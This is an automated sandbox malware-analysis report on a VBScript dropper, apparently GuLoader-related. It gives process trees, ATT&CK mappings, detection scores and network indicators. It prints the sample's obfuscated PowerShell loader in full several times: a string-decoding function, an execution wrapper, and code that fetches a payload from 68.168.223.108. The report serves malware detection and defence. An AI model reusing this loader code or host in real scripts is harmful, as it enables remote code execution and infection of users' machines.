umlina prodkilesom.gilwillegsgonad paranfacultr sle b try1 tita0 neut.restr0umora;disv wan lwstimuihjertnunte 6medbo4mudst;udsty keciax bill6 ava4wicki;lagri hawmrhunchvcbest:ifrer1ingse3nasio4s,ema.udla 0tabli)unalc revolgfaaf eequipcquin,ksphaeo gru / cram2 husa0 u.ya1 week0t old0herm.1blast0milli1therm fortjfduffailbeilreberteharmlf,sychotrigoxchemo/bihen1ba.al3fo pa4binar. 
etst0';$transculturation=centralkomites 'skinnu skilsuningefo.terlavem-c eatatrochg nrule ekstnudartt';$briggsk116=centralkomites ' dischsaigat l.tttbundfpanhe :absfa/ flaa/dr ve6sconc8 eva..k bel1 arss6no pa8marab.raa e2p,ove2musee3 skam.adiap1 gyno0dv gb8u rep/ sheljudlovdl the/cobalgj ngaodrewrsstealsve.dairibonpkorpseprogrrbobecshansa.reopetam ryoweakmc';$aftgtsydelser=centralkomites ' pist>';$likrer=centralkomites 'rykkeiisthmepermix';$hyposynergia='sprngningsekspertens';$konsigneres='\discoach.imm';desiodothyroxine3 (centralkomites '.loms$ upsoghimmel gushovand,blabioabriselreinf: ove a buskf.orgeg seldis,rivvacr tedoodalgyp ysru,ddeeu,ogninsors penu=endoc$spen,epol tn blomvscumm: borda .byspquinapafskrdblamia infitlitmua brod+donat$printkdu.niofr nanfishlsbegorium.rsgpicklnasthoetagdkrhjspnetube s');desiodothyroxine3 (centralkomites 'tho k$ adstgsemiblb,folodactybfassaak risludlgg:unen pf gler ialti ttacsp nnikridicrexcitijejungfastlebr gnnsymbre ars=metap$ v lsbillu,rat mdiconfegbekengrepreslukrek sd,k1jydep1balne6kryst. fop spigwapwilcol ch ligtesktpriso(ligh.$uknneapolelfafbettmeropgme.ogtconvesstamky corndbrushe serilpunktsdappeeafgnarcockn)');desiodothyroxine3 (centralkomites $personnummers);$briggsk116=$priskrigene[0];$skaberkrfters=(centralkomites 'nimme$.tandgbou.hlerob,otasseb excradigt
          Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "get-service;$thickskulled='func';get-history;$thickskulled+='t';get-history;$thickskulled+='i';$hyldebusk=get-history;$thickskulled+='on:';(ni -p $thickskulled -n centralkomites -value { param($toenderne);$udlaansafdelingerne=5;do {$hypersonically78+=$toenderne[$udlaansafdelingerne];$udlaansafdelingerne+=6} until(!$toenderne[$udlaansafdelingerne])$hypersonically78});convertto-html;(ni -p $thickskulled -n desiodothyroxine3 -value {param($yodhs);.($likrer) ($yodhs)});convertto-html;$protozoal=centralkomites 'udhunnaandseh lvftknowi.sygehw';$protozoal+=centralkomites 'tra.pe ng ebgee.scstannl espiweekeeskrumnove,ft';$affaldsbehandlingssystem=centralkomites 'stensm suitotapwozplatfividerlrooinl kogla galm/';$humps=centralkomites 'unt,rt b ralshowes ksko1i ter2';$personnummers='natur[ mor.npaa eemondotell c.audiossuperedirkertilkmvkorreial efcpyramebrrespapprooassoriu visnwhi ktintegm per agrievn ddanafortrgfremhefren rsoutf]hellb: hove: ensesenguler.novcs wdeu postracadeielytrtavedrysoejlppardyrcodebobassitdeteko fermc utm.ou derl un,e=gener$unenchudkrau ponsmabeskpcheaps';$affaldsbehandlingssystem+=centralkomites 're.ym5 me e. re a0civil basha(,idsnwfjorti umlina prodkilesom.gilwillegsgonad paranfacultr sle b try1 tita0 neut.restr0umora;disv wan lwstimuihjertnunte 6medbo4mudst;udsty keciax bill6 ava4wicki;lagri hawmrhunchvcbest:ifrer1ingse3nasio4s,ema.udla 0tabli)unalc revolgfaaf eequipcquin,ksphaeo gru / cram2 husa0 u.ya1 week0t old0herm.1blast0milli1therm fortjfduffailbeilreberteharmlf,sychotrigoxchemo/bihen1ba.al3fo pa4binar. 
etst0';$transculturation=centralkomites 'skinnu skilsuningefo.terlavem-c eatatrochg nrule ekstnudartt';$briggsk116=centralkomites ' dischsaigat l.tttbundfpanhe :absfa/ flaa/dr ve6sconc8 eva..k bel1 arss6no pa8marab.raa e2p,ove2musee3 skam.adiap1 gyno0dv gb8u rep/ sheljudlovdl the/cobalgj ngaodrewrsstealsve.dairibonpkorpseprogrrbobecshansa.reopetam ryoweakmc';$aftgtsydelser=centralkomites ' pist>';$likrer=centralkomites 'rykkeiisthmepermix';$hyposynergia='sprngningsekspertens';$konsigneres='\discoach.imm';desiodothyroxine3 (centralkomites '.loms$ upsoghimmel gushovand,blabioabriselreinf: ove a buskf.orgeg seldis,rivvacr tedoodalgyp ysru,ddeeu,ogninsors penu=endoc$spen,epol tn blomvscumm: borda .byspquinapafskrdblamia infitlitmua brod+donat$printkdu.niofr nanfishlsbegorium.rsgpicklnasthoetagdkrhjspnetube s');desiodothyroxine3 (centralkomites 'tho k$ adstgsemiblb,folodactybfassaak risludlgg:unen pf gler ialti ttacsp nnikridicrexcitijejungfastlebr gnnsymbre ars=metap$ v lsbillu,rat mdiconfegbekengrepreslukrek sd,k1jydep1balne6kryst. fop spigwapwilcol ch ligtesktpriso(ligh.$uknneapolelfafbettmeropgme.ogtconvesstamky corndbrushe serilpunktsdappeeafgnarcockn)');desiodothyroxine3 (centralkomites $personnummers);$briggsk116=$priskrigene[0];$skaberkrfters=(centralkomites 'nimme$.tandgbou.hlerob,otasseb excradigt
          Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "get-service;$thickskulled='func';get-history;$thickskulled+='t';get-history;$thickskulled+='i';$hyldebusk=get-history;$thickskulled+='on:';(ni -p $thickskulled -n centralkomites -value { param($toenderne);$udlaansafdelingerne=5;do {$hypersonically78+=$toenderne[$udlaansafdelingerne];$udlaansafdelingerne+=6} until(!$toenderne[$udlaansafdelingerne])$hypersonically78});convertto-html;(ni -p $thickskulled -n desiodothyroxine3 -value {param($yodhs);.($likrer) ($yodhs)});convertto-html;$protozoal=centralkomites 'udhunnaandseh lvftknowi.sygehw';$protozoal+=centralkomites 'tra.pe ng ebgee.scstannl espiweekeeskrumnove,ft';$affaldsbehandlingssystem=centralkomites 'stensm suitotapwozplatfividerlrooinl kogla galm/';$humps=centralkomites 'unt,rt b ralshowes ksko1i ter2';$personnummers='natur[ mor.npaa eemondotell c.audiossuperedirkertilkmvkorreial efcpyramebrrespapprooassoriu visnwhi ktintegm per agrievn ddanafortrgfremhefren rsoutf]hellb: hove: ensesenguler.novcs wdeu postracadeielytrtavedrysoejlppardyrcodebobassitdeteko fermc utm.ou derl un,e=gener$unenchudkrau ponsmabeskpcheaps';$affaldsbehandlingssystem+=centralkomites 're.ym5 me e. re a0civil basha(,idsnwfjorti umlina prodkilesom.gilwillegsgonad paranfacultr sle b try1 tita0 neut.restr0umora;disv wan lwstimuihjertnunte 6medbo4mudst;udsty keciax bill6 ava4wicki;lagri hawmrhunchvcbest:ifrer1ingse3nasio4s,ema.udla 0tabli)unalc revolgfaaf eequipcquin,ksphaeo gru / cram2 husa0 u.ya1 week0t old0herm.1blast0milli1therm fortjfduffailbeilreberteharmlf,sychotrigoxchemo/bihen1ba.al3fo pa4binar. 
etst0';$transculturation=centralkomites 'skinnu skilsuningefo.terlavem-c eatatrochg nrule ekstnudartt';$briggsk116=centralkomites ' dischsaigat l.tttbundfpanhe :absfa/ flaa/dr ve6sconc8 eva..k bel1 arss6no pa8marab.raa e2p,ove2musee3 skam.adiap1 gyno0dv gb8u rep/ sheljudlovdl the/cobalgj ngaodrewrsstealsve.dairibonpkorpseprogrrbobecshansa.reopetam ryoweakmc';$aftgtsydelser=centralkomites ' pist>';$likrer=centralkomites 'rykkeiisthmepermix';$hyposynergia='sprngningsekspertens';$konsigneres='\discoach.imm';desiodothyroxine3 (centralkomites '.loms$ upsoghimmel gushovand,blabioabriselreinf: ove a buskf.orgeg seldis,rivvacr tedoodalgyp ysru,ddeeu,ogninsors penu=endoc$spen,epol tn blomvscumm: borda .byspquinapafskrdblamia infitlitmua brod+donat$printkdu.niofr nanfishlsbegorium.rsgpicklnasthoetagdkrhjspnetube s');desiodothyroxine3 (centralkomites 'tho k$ adstgsemiblb,folodactybfassaak risludlgg:unen pf gler ialti ttacsp nnikridicrexcitijejungfastlebr gnnsymbre ars=metap$ v lsbillu,rat mdiconfegbekengrepreslukrek sd,k1jydep1balne6kryst. fop spigwapwilcol ch ligtesktpriso(ligh.$uknneapolelfafbettmeropgme.ogtconvesstamky corndbrushe serilpunktsdappeeafgnarcockn)');desiodothyroxine3 (centralkomites $personnummers);$briggsk116=$priskrigene[0];$skaberkrfters=(centralkomites 'nimme$.tandgbou.hlerob,otasseb excradigt
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 321 Scripting | Valid Accounts | 1 Windows Management Instrumentation | 321 Scripting | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 1 Security Software Discovery | Remote Services | Data from Local System | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 DLL Side-Loading | 21 Virtualization/Sandbox Evasion | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 21 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 11 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | 1 PowerShell | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Software Packing | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 13 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
Source | Detection | Scanner | Label
Agterdelen.vbs | 0% | ReversingLabs |
SAMPLE | 100% | Joe Sandbox ML |
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
Source | Detection | Scanner | Label
http://68.168.223.108/JD/Gossipers.t | 0% | Avira URL Cloud | safe
http://68.168.22 | 0% | Avira URL Cloud | safe
http://68.168.223.108/JD/Gossi | 0% | Avira URL Cloud | safe
http://68.168.223.108/JD/Gossipers. | 0% | Avira URL Cloud | safe
http://68.168.H | 0% | Avira URL Cloud | safe
http://68.168.223.108/JD/Gossipers | 0% | Avira URL Cloud | safe
http://68.168.223.108/JD/Goss | 0% | Avira URL Cloud | safe
http://68.168.223.108/JD/Gossipers.tocXR | 0% | Avira URL Cloud | safe
http://68.1 | 0% | Avira URL Cloud | safe
http://68.168.223.108/JD/Gossipe | 0% | Avira URL Cloud | safe
http://68.168.223. | 0% | Avira URL Cloud | safe
http://68.168.2 | 0% | Avira URL Cloud | safe
http://68.168.223.108 | 0% | Avira URL Cloud | safe
http://68.168.223.10 | 0% | Avira URL Cloud | safe
http://68.16 | 0% | Avira URL Cloud | safe
http://68.168. | 0% | Avira URL Cloud | safe
http://68.168.223.108/JD/Go | 0% | Avira URL Cloud | safe
http://68.168 | 0% | Avira URL Cloud | safe
http://68.168.223.108/JD/Gossipers.to | 0% | Avira URL Cloud | safe
http://68.168.223.108/JD/Gos | 0% | Avira URL Cloud | safe
http://68.168.223.108/J | 0% | Avira URL Cloud | safe
http://68.168.223.108/JD/Gossiper | 0% | Avira URL Cloud | safe
http://68.168.223.108/ | 0% | Avira URL Cloud | safe
http://68.168.223.108/JD/Gossipers.toc | 0% | Avira URL Cloud | safe
http://68.168.223.1 | 0% | Avira URL Cloud | safe
http://68.168.223.108/JD/Gossipers.tocP | 0% | Avira URL Cloud | safe
http://68.168.223 | 0% | Avira URL Cloud | safe
http://68.168.223.108/JD/ | 0% | Avira URL Cloud | safe
http://68.168.223.108/JD | 0% | Avira URL Cloud | safe
http://68.168.223.108/JD/Gossip | 0% | Avira URL Cloud | safe
http://68.168.223.108/JD/G | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
bg.microsoft.map.fastly.net | 199.232.210.172 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
http://68.168.223.108/JD/Gossipers.toc | false | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://68.168.223.108/JD/Gossipers.t | powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000005.00000002.1394333131.000001D1B4995000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2557671310.00000000053ED000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://68.168.223.108/JD/Gossipers | powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000008.00000002.2541328902.00000000044D8000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000008.00000002.2541328902.00000000044D8000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://68.168.223.108/JD/Gossi | powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://68.168.22 | powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://68.168.H | powershell.exe, 00000005.00000002.1357902050.000001D1A5700000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.microsoft.co | powershell.exe, 00000005.00000002.1403411874.000001D1BD0B0000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000008.00000002.2557671310.00000000053ED000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://68.168.223.108/JD/Gossipers. | powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000008.00000002.2557671310.00000000053ED000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://68.1 | powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://68.168.223.108/JD/Gossipe | powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://68.168.223.108/JD/Gossipers.tocXR | powershell.exe, 00000008.00000002.2541328902.00000000044D8000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://68.168.223.108/JD/Goss | powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000008.00000002.2541328902.00000000044D8000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://68.168.2 | powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://68.168.223. | powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://68.168.223.10 | powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://68.168.223.108 | powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1357902050.000001D1A4B49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1357902050.000001D1A5700000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://68.168. | powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/pscore6lB | powershell.exe, 00000008.00000002.2541328902.0000000004381000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://68.16 | powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://68.168.223.108/JD/Go | powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/ | powershell.exe, 00000008.00000002.2557671310.00000000053ED000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 00000005.00000002.1394333131.000001D1B4995000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2557671310.00000000053ED000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://68.168.223.108/JD/Gossipers.to | powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://68.168 | powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://68.168.223.108/JD/Gos | powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://68.168.223.108/JD/Gossiper | powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://68.168.223.108/ | powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://68.168.223.108/J | powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://68.168.223.108/JD/Gossip | powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000005.00000002.1357902050.000001D1A4921000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://68.168.223.1 | powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://68.168.223.108/JD/Gossipers.tocP | powershell.exe, 00000005.00000002.1357902050.000001D1A4B49000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://68.168.223 | powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://68.168.223.108/JD/ | powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000005.00000002.1357902050.000001D1A4921000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2541328902.0000000004381000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://68.168.223.108/JD | powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://68.168.223.108/JD/G | powershell.exe, 00000005.00000002.1357902050.000001D1A55A2000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
68.168.223.108 | unknown | United States | 19318 | IS-AS-1US | false
                                    Joe Sandbox version:42.0.0 Malachite
                                    Analysis ID:1665610
                                    Start date and time:2025-04-15 17:34:02 +02:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 5m 21s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:14
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:Agterdelen.vbs
                                    Detection:MAL
                                    Classification:mal96.troj.expl.evad.winVBS@6/9@0/1
                                    Cookbook Comments:
                                    • Found application associated with file extension: .vbs
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                    • Excluded IPs from analysis (whitelisted): 199.232.210.172, 23.76.34.6, 4.245.163.56
                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, c.pki.goog, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
11:35:10 | API Interceptor | 1x Sleep call for process: wscript.exe modified
11:35:12 | API Interceptor | 76x Sleep call for process: powershell.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
68.168.223.108 | https://workdrive.zohoexternal.com/external/b63c3fc869a1c3feb821637810b1254e8fc2cef6b6cf3da88344ebd42bba45f5/download | malicious | GuLoader | 68.168.223.108/otot/Censurerings.mdp
Match | Associated Sample Name / URL | Detection | Threat Name | Context
bg.microsoft.map.fastly.net | original.eml | malicious | Gabagool | 199.232.214.172
bg.microsoft.map.fastly.net | PURCHASE OKK.vbs | malicious | FormBook | 199.232.210.172
bg.microsoft.map.fastly.net | nK8noQeiXl.exe | malicious | HTMLPhisher, CryptOne, LummaC Stealer, Socks5Systemz, Tofsee | 199.232.210.172
bg.microsoft.map.fastly.net | SecuriteInfo.com.Win32.MalwareX-gen.14672.5040.exe | malicious | FormBook | 199.232.210.172
bg.microsoft.map.fastly.net | https://degrgd.dailyenglish.it.com/ODIWCBlb | malicious | HTMLPhisher, ReCaptcha Phish | 199.232.214.172
bg.microsoft.map.fastly.net | Fatura.pdf | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | 728-3512-19.hta | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | Scanned Page(s).pdf | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | 888.exe | malicious | GO Backdoor | 199.232.214.172
bg.microsoft.map.fastly.net | exe.exe | malicious | Amadey, LummaC Stealer | 199.232.214.172
Match | Associated Sample Name / URL | Detection | Threat Name | Context
IS-AS-1US | set.msi | malicious | RMSRemoteAdmin, Remote Utilities | 64.20.61.146
IS-AS-1US | https://manhuaus.org/ | malicious | Unknown | 216.219.92.22
IS-AS-1US | http://httpswwwstatregerhegergrtodayr.rolinfo.de/4pjFho170689Jahf960ulhnbgpcjo1454QYTQGMFVRKUYIQV11812YOJV712361h21 | malicious | Unknown | 216.219.92.22
IS-AS-1US | Alphabet Soup Part B.docx | malicious | Unknown | 216.219.92.22
IS-AS-1US | MY TAX FORMS & ORGANIZER 2024.zip | malicious | AsyncRAT | 67.211.208.99
IS-AS-1US | JavaUpdater943034.dll | malicious | Remcos | 173.225.103.138
IS-AS-1US | https://i.imgur.com/ZC2vWmL.png | malicious | Unknown | 216.219.92.22
IS-AS-1US | loader.vbs | malicious | Fallen Miner, Xmrig | 216.219.85.122
IS-AS-1US | s-h.4-.Sakura.elf | malicious | Gafgyt, Mirai | 162.246.21.236
IS-AS-1US | x-8.6-.Sakura.elf | malicious | Gafgyt, Mirai | 162.246.21.236
                                    No context
                                    No context
                                    Process:C:\Windows\System32\wscript.exe
                                    File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 73305 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                    Category:dropped
                                    Size (bytes):73305
